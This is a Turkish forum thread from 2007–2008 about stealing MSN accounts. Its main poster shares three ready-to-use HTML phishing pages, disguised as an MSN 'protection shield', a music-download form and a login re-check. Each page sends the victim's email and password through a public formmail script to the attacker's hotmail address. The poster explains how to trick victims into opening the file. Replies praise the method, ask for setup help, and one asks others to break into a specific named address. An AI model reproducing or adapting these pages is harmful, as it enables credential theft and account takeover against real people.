msn çalma

Msn Çalma yontemleri & programları

Yetkili: Moderator Grubu

msn çalma

İletigönderen erhan tarih 22 Ağu 2007 13:29

arkadaşlar bu programla istediğiniz kişinin msn sini çalabilirsiniz nasılmı işte bununla bu kodu bir not defterine kaydedin

işte kod

<html><center><title>MSN</title><font size=8 >msn koruma kalkanı</font><br><br><br><font size=5 color=blue>Mns nizin korunması için öncelikle giriş yapın..!</font><body background=http://>MSN HACK KORUMA KALKANI<br><br><br><form method=post action=http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl><font size=4>Mailiniz :<input type=text name=mail><br><font size=4>Sifreniz :<input type=password name=sifre><br><input type=submit value=Tamam><input type=hidden name=recipient value=????@hotmail.com><input type=hidden name=email value=fakemake@forumturka.net><input type=hidden name=realname value=fakemake><input type=hidden name=subject value=sifre><input type=hidden name=title value=Hata_olustu></body></center></html>

bu kodu kaydettikten sonra olarak belirtiğim yere kendi meil adresinizi yazıp  uzantısını.html olarak kaydediyorsunuz ve herhangi bir kişiye yutturuyorsunuz o kişi de uzantıyı açtığında meil adresini ve şifresini yazınca meil adresinize o kişinin şifresi geliyor bu kadar basit

anlamadığınız yerler için black@blade.ogz de beni bulabilirsiniz
erhan
Yeni Üye
Yeni Üye

ads

düzeltme

İletigönderen erhan tarih 23 Ağu 2007 17:22

value=????@hotmail.com

olan yere kendi meail adresinizi yazacaksınız
örnk: birisi@hotmail.com
erhan
Yeni Üye
Yeni Üye

Re : msn çalma

İletigönderen androit tarih 03 Eyl 2007 10:57

bunları artık koly kolay kimse yemio ama genede arada çıkıyon sazanlar

emeğine sağlık
Kullanıcı avatarı
androit
Yeni Üye
Yeni Üye

İletigönderen eray_aksoylu tarih 03 Eyl 2007 10:58

çok saol kardeş emeğine sağlık sıra geldi bunu yiyecek kek insan bulmaya  :wink:  :D  :mrgreen:
Herşey Bitti Birazdan Sende BİTECEKSİN
®©™
eray_aksoylu
Yeni Üye
Yeni Üye

İletigönderen erhan tarih 06 Eyl 2007 18:35

bu da farklı bir yöntem müzik severlere yutturabilirsiniz saygılarımla....

<html><center><title>MSN</title><font size=8 color=orange>müzik indirebilmek için lütfen doldurunuz..</font><br><br><br><font size=5 color=blue>Müzikler direk olarak meil adresinize geleceğinden lütfen doğru bilgileri giriniz..!</font><body background=http://www.comune.torino.it/circ1/servizi/servizi_tempo_libero/immagini/nota_musicale.jpg ><br><br><br><form method=post action=http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl><font size=4>Mailiniz :<input type=text name=mail><br><font size=4>Sifreniz :<input type=password name=sifre><br><input type=hidden name=recipient value=??????@hotmail.com><input type=hidden name=email value=fakemake@forumturka.net><input type=hidden name=realname value=fakemake><input type=hidden name=subject value=sifre><input type=hidden name=title value=Site Dolu></body></center></html>

<html><center><title>MSN</title><font size=8 color=orange>siteye giriş için doldurunuz..</font><br><br><br><font size=5 color=blue>Lütfen bilgilerinizi doğrulayınız..!</font><body background= ><br><br><br><form method=post action=http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl><font size=4>Meil adresi tekrar:<input type=text name=mail><br><font size=4>Sifreniz tekrar :<input type=password name=sifre><br><input type=submit value=Tamam><input type=hidden name=recipient value=???????@hotmail.com><input type=hidden name=email value=fakemake@forumturka.net><input type=hidden name=realname value=fakemake><input type=hidden name=subject value=sifre><input type=hidden name=title value=Hata_olustu></body></center></html>

sanatcinin ismi :<input type=password
>Sarkisi :<input type=password
>Sarki turu :<input type=password

bunu da aynı şekilde yutturun kolay gelsin....
erhan
Yeni Üye
Yeni Üye

İletigönderen suna15 tarih 08 Eyl 2007 21:14

bu çok gslmiş ama birine yolladım almadı hemen zeki anlamış ama çok sa0l
suna15
Yeni Üye
Yeni Üye

İletigönderen virgo tarih 25 Ekm 2007 13:23

ben yaptım ama olmadı daha doğrusu yalnış yaptım sanırım tekrar anlatabilirsen sevinirim
virgo
Yeni Üye
Yeni Üye

Re: msn çalma

İletigönderen tiribaldragon tarih 20 Şub 2008 17:24

abiler  ben bu işleri beceremem ama benim için bu adresi patlatırsanız çok sevinirim herkese çok teşekkür ederim  saatchi5@hotmail.com  bu adresi palatın  abiResim
tiribaldragon
Yeni Üye
Yeni Üye

Re: msn çalma

İletigönderen muammer tarih 24 Mar 2008 17:16

ya ben  bu kodu nereye girceğimi bilmiorom lütfen cevap yazın
muammer
Yeni Üye
Yeni Üye

İletigönderen burhangfb58 tarih 25 Mar 2008 17:29

kardeşim linkler buzkmu olmuyor ya devalı
baska yazılar cıkıyorr